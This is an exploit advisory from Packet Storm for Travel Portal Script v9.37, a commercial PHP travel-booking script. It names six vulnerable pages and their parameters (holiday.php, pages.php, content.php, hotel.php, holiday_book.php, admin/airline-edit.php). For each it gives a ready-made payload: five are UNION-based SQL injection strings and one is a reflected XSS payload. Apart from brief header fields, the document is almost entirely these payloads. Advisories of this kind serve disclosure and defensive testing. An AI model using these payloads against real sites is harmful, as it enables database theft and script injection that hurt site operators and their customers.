Travel Portal Script version 9.37 suffers from multiple remote SQL injection vulnerabilities.
04f8f840784235700049ba92bdf77fde8099a2f9c583c70e2a20558b489b21daExploit Title : Travel Portal Script v9.37 - Multiple Vulnerability
Google Dork : -
Date : 23/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : http://itechscripts.com/travel-portal-script/
Software Link: http://travel.itechscripts.com/
Type : webapps
Platform: PHP
Version: 9.37
Sofware Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/holiday.php
Vulnerable Parameters: hid
Method: GET
Payload: "/><img src=i onerror=prompt(1)>
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/pages.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/content.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/hotel.php
Vulnerable Parameters: id
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
-------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/holiday_book.php
Vulnerable Parameters: hid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php
Vulnerable Parameters: fid
Method: GET
Payload:-1 UNION ALL SELECT
NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL--
lRVf
------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed